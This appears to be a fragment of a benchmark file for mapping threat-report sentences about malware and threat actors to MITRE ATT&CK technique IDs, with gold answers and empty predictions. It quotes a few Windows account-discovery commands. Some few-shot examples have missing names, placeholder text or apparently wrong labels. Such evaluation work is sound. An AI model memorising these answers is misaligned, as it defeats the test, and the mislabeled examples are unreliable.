Setup\n- Text: Lazarus Group has used VBScript to gather information about a victim machine.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "NanoCore creates a RunOnce key in the Registry to execute its VBS scripts each time the user logs on to the machine.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Shark can send DNS C2 communications using a unique domain generation algorithm.\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n- Text: PoetRAT used TLS to encrypt command and control (C2) communications.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: Bazar can send C2 communications with XOR encryption.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "Grandoreiro can use a DGA for hiding C2 addresses, including use of an algorithm with a user-specific key that changes daily.", + "gold": "- T1568.002: Dynamic Resolution - Domain Generation Algorithms", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Honeybee, the threat actors used Base64 to encode files with a custom key.\n\t - T1027: Obfuscated Files or Information\n- Text: Hancitor has decoded Base64 encoded URLs to insert a recipient\u2019s name into the filename of the Word document. Hancitor has also extracted executables from ZIP files.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Bazar can hash then resolve API calls at runtime.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n", + "input": "Most of the strings in ADVSTORESHELL are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FinFisher clears the system event logs using \" OpenEventLog/ClearEventLog APIs \".\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n- Text: APT29 used \"AUDITPOL\" to prevent the collection of audit logs.\n\t - T1562.002: Impair Defenses - Disable Windows Event Logging\n- Text: No matching sample found for T1546.014\n", + "input": "gh0st RAT is able to wipe event logs.", + "gold": "- T1070.001: Indicator Removal - Clear Windows Event Logs", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OSX_OCEANLOTUS.D can use HTTP POST and GET requests to send and receive C2 information.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: GrimAgent can base64 encode C2 replies.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: GravityRAT has used HTTP over a non-standard port, such as TCP port 46769.\n\t - T1571: Non-Standard Port\n", + "input": "Aria-body has used HTTP in C2 communications.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: \"beacon\" payload can collect information on process details.\n\t - T1057: Process Discovery\n- Text: Empire can enumerate the current network connections of a host.\n\t - T1049: System Network Connections Discovery\n- Text: jRAT can list local services.\n\t - T1007: System Service Discovery\n", + "input": "PowerShower has the ability to deploy a reconnaissance module to retrieve a list of the active processes.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Hook module structure After decrypting the strings, it became clear that the Linux Hook main module communicated with the same CnC server as other Windows modules: The CNC\u2019s IP address in the Linux module This Linux module can process the following commands, some of which are similar to the Windows version: die delete all BlackEnergy2 files and system traces kill delete all BlackEnergy2 files and system traces and reboot lexec launch a command using bin/sh rexec download and launch file using \u2018fork/exec\u2019 update rewrite self file migrate update the CnC server Windows Plugins After the disclosure of an unusual CnC server that pushed Linux and the new Windows plugins we paid greater attention to new BE2 samples and associated CnCs\n\t - T1106: Native API\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1105: Ingress Tool Transfer\n- Text: MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.\n\t - T1104: Multi-Stage Channels\n- Text: Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments. Disclosure of this information went through the same IGL process as discussed in the Whois Anchor Panda blog post\n\t - T1102.002: Web Service - Bidirectional Communication\n", + "input": "KARAE can upload and download files, including second-stage malware.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MacSpy stores itself in \"~/Library/.DS_Stores/\"\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n- Text: The payload is an application that creates a hidden window (the name of the class and the window is SK_Parasite\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: TeamTNT has aggregated collected credentials in text files before exfiltrating.\n\t - T1074.001: Data Staged - Local Data Staging\n", + "input": "Agent Tesla has created hidden folders.", + "gold": "- T1564.001: Hide Artifacts - Hidden Files and Directories", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WannaCry attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores.\n\t - T1489: Service Stop\n- Text: can run a command on another machine using .\n\t - T1569.002: System Services - Service Execution\n- Text: Metamorfo has a function to kill processes associated with defenses and can prevent certain processes from launching.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n", + "input": "HotCroissant has the ability to stop services on the infected host.", + "gold": "- T1489: Service Stop", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sidewinder has used \"mshta.exe\" to execute malicious payloads.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: is capable of spawning a Windows command shell.\n\t - T1059: Command and Scripting Interpreter\n- Text: EvilBunny has an integrated scripting engine to download and execute Lua scripts.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Mustang Panda has used mshta.exe to launch collection scripts.", + "gold": "- T1218.005: System Binary Proxy Execution - Mshta", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1563\n- Text: Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9. This document contains an in-line link to a URL hosting a malware payload. When clicked, these links download malware binaries with file names masquerading as document files. In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files. Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\\Windows\\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\\Windows\\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n", + "input": "zwShell has established persistence by adding itself as a new service.", + "gold": "- T1543.003: Create or Modify System Process - Windows Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Axiom has used VPS hosting providers in targeting of intended victims.\n\t - T1583.003: Acquire Infrastructure - Virtual Private Server\n- Text: Earth Lusca has acquired multiple servers for some of their operations, using each server for a different role.\n\t - T1583.004: Acquire Infrastructure - Server\n- Text: No matching sample found for T1584\n", + "input": "Gelsemium has established infrastructure through renting servers at multiple providers worldwide.", + "gold": "- T1583.004: Acquire Infrastructure - Server", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: actors used the following commands following exploitation of a machine with malware to enumerate user accounts: net user >> %temp%\\download net user /domain >> %temp%\\download\n\t - T1087: Account Discovery\n- Text: has checked for the local admin group domain admin group and Exchange Trusted Subsystem groups using the commands net group Exchange Trusted Subsystem /domain and net group domain admins /domain.\n\t - T1069: Permission Groups Discovery\n- Text: GoldenSpy can create new users on an infected system.\n\t - T1136.001: Create Account - Local Account\n", + "input": "ShimRatReporter listed all non-privileged and privileged accounts available on the machine.", + "gold": "- T1087: Account Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Turla has used compromised servers as infrastructure.\n\t - T1584.004: Compromise Infrastructure - Server\n- Text: Leviathan has created new email accounts for targeting efforts.\n\t - T1585.002: Establish Accounts - Email Accounts\n- Text: Threat Group-3390 has hosted malicious payloads on Dropbox.\n\t - T1608.001: Stage Capabilities - Upload Malware\n", + "input": "For Operation Sharpshooter, the threat actors compromised a server they used as part of the campaign's infrastructure.", + "gold": "- T1584.004: Compromise Infrastructure - Server", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: sends an OS version identifier in its beacons.\n\t - T1082: System Information Discovery\n- Text: RTM can obtain the victim username and permissions.\n\t - T1033: System Owner/User Discovery\n- Text: Chinese state-sponsored cyber actors have been observed: \uf0b7 Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI). \uf0b7 Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. \uf0b7 Employing Python scripts to exploit vulnerable servers. \uf0b7 Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n\t - T1059.006: Command and Scripting Interpreter - Python\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n\t - T1059.008: Command and Scripting Interpreter - Network Device CLI\n", + "input": "OSX/Shlayer has collected the IOPlatformUUID, session UID, and the OS version using the command \"sw_vers -productVersion\".", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: C2 Command Purpose reboot Reboot the system using shutdown command shutdown Shut down the system using shutdown command clean Wipe the Drives, C:\\, D:\\, E:\\, F:\\ screenshot Take a screenshot of the System upload Encrypt and upload the information from the system excel Leverage Excel.Application COM object for code execution outlook Leverage Outlook.Application COM object for code execution risk Leverage DCOM object for code execution Conclusion This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware\n\t - T1113: Screen Capture\n\t - T1082: System Information Discovery\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1106: Native API\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: ComRAT has used a task name associated with Windows SQM Consolidator.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely create a Windows Scheduled Task on target systems to execute the payload\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", + "input": "CosmicDuke uses scheduled tasks typically named \"Watchmon Service\" for persistence.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Operation Wocao has used the Xserver backdoor to exfiltrate data.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Donut can use HTTP to download previously staged shellcode payloads.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: For example, the following string would be included in one of the HTTP parameters sent to the C2 server: eRmaVsr90D-7Ig1ngV3PkdouzP974 In this specific case, the actor made a mistake when configuring this XAgent sample with its C2 locations\n\t - T1071: Application Layer Protocol\n\t - T1008: Fallback Channels\n", + "input": "STARWHALE has the ability to contact actor-controlled C2 servers via HTTP.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Flagpro can use Native API to enable obfuscation including `GetLastError` and `GetTickCount`.\n\t - T1106: Native API\n- Text: Clop has checked the keyboard language using the GetKeyboardLayout() function to avoid installation on Russian-language or other Commonwealth of Independent States-language machines; it will also check the \"GetTextCharset\" function.\n\t - T1614.001: System Location Discovery - System Language Discovery\n- Text: ZxShell has a command to clear system event logs.\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n", + "input": "S-Type has used Windows APIs, including `GetKeyboardType`, `NetUserAdd`, and `NetUserDel`.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Tomiris has been packed with UPX.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: During Frankenstein, the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website.\n\t - T1221: Template Injection\n- Text: Although the targeting profile is the same as the Russian banking cluster, the TTPs are very different. In particular, the use of tooling stands out from other clusters of CARBON SPIDER activity. As with other clusters, the primary infection vector is targeted spear phishing emails that use exploits for a variety of vulnerabilities in Microsoft Office:\n\t - T1203: Exploitation for Client Execution\n\t - T1588.006: Obtain Capabilities - Vulnerabilities\n\t - T1566: Phishing\n", + "input": "VERMIN is initially packed.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Magic Hound campaign was also discovered deploying an IRC Bot, which we have named MagicHound.Leash. We discovered this connection when we observed a DropIt sample installing a backdoor Trojan that used IRC for its C2 communications\n\t - T1113: Screen Capture\n- Text: The Regin malware platform uses Extended Attributes to store encrypted executables.\n\t - T1564.004: Hide Artifacts - NTFS File Attributes\n- Text: Once the VBScript in XSL has been run, console commands launched by the JS code continue to be executed. Three files are copied into the folder OFFICE12 that was created in the user profile. Those files are\n\t - T1220: XSL Script Processing\n", + "input": "PowerShower has the ability to save and execute VBScript.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The payload sends system information about the infected computer to the C&C server and downloads additional tools.\n\t - T1082: System Information Discovery\n- Text: HotCroissant has the ability to collect the username on the infected host.\n\t - T1033: System Owner/User Discovery\n- Text: Octopus has uploaded stolen files and data from a victim's machine over its C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "NDiskMonitor obtains the victim computer name and encrypts the information to send over its C2 channel.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CSPY Downloader can use GET requests to download additional payloads from C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: The Ritsol backdoor trojan used by can download files onto a compromised host from a remote location.\n\t - T1105: Ingress Tool Transfer\n- Text: XCSSET uses a malicious browser application to replace the legitimate browser in order to continuously capture credentials, monitor web traffic, and download additional modules.\n\t - T1554: Compromise Host Software Binary\n", + "input": "GuLoader can use HTTP to retrieve additional binaries.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has connected to C2 servers through proxies.\n\t - T1090: Proxy\n- Text: Interestingly, there is an option in the RC2CL module to turn off its backdoor functionality and act as a proxy. In this case, the malware turns off the Windows firewall and creates a server that relays communication between a client and C&C server, or between two clients\n\t - T1090.001: Proxy - Internal Proxy\n- Text: uses a copy of tor2web proxy for HTTPS communications.\n\t - T1090.003: Proxy - Multi-hop Proxy\n", + "input": "A TYPEFRAME variant can force the compromised system to function as a proxy server.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Wiping all available methods of recovery shows this attacker had no intention of leaving the machine useable. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started\n\t - T1489: Service Stop\n- Text: These macro injection modules also have the functionality to tamper with the Microsoft Office macro security settings\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: The VBScript in turn runs rundll32.exe, activating the Cobalt Strike DLL (step #5) using a clean parent/child process tree completely disconnected from the SolarWinds process. Finally, the VBScript removes the previously created IFEO value to clean up any traces of execution (step #6) and also deletes the following registry keys related to HTTP proxy\n\t - T1070: Indicator Removal\n\t - T1112: Modify Registry\n", + "input": "Avaddon looks for and attempts to stop anti-malware solutions.", + "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ObliqueRAT can discover pluggable/removable drives to extract files from.\n\t - T1120: Peripheral Device Discovery\n- Text: BADNEWS copies files with certain extensions from USB devices to\na predefined directory.\n\t - T1025: Data from Removable Media\n- Text: copies staged data to removable drives when they are inserted into the system.\n\t - T1052: Exfiltration Over Physical Medium\n", + "input": "The FunnyDream FilepakMonitor component can detect removable drive insertion.", + "gold": "- T1120: Peripheral Device Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly has used spearphising campaigns to gain access to victims.\n\t - T1566: Phishing\n- Text: This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. Hancom Office is widely used in South Korea. The account is hardcoded in the module along with the master\u2019s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: GoldenSpy has been packaged with a legitimate tax preparation software.\n\t - T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n", + "input": "GOLD SOUTHFIELD has conducted malicious spam (malspam) campaigns to gain access to victim's machines.", + "gold": "- T1566: Phishing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When running under a limited UAC account, the installer extracts d3d9.dll and creates a persistence key under HKCU\\Software\\Microsoft\\Windows\\Run\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: This shortcut file calls the built-in \u2018control.exe\u2019 utility to in turn load the previously dropped malicious CPL file of \u2018winhelp.cpl\u2019\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: jRAT can list and manage startup entries.\n\t - T1037.005: Boot or Logon Initialization Scripts - Startup Items\n", + "input": "Trojan.Karagany can create a link to itself in the Startup folder to automatically start itself upon system restart.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + 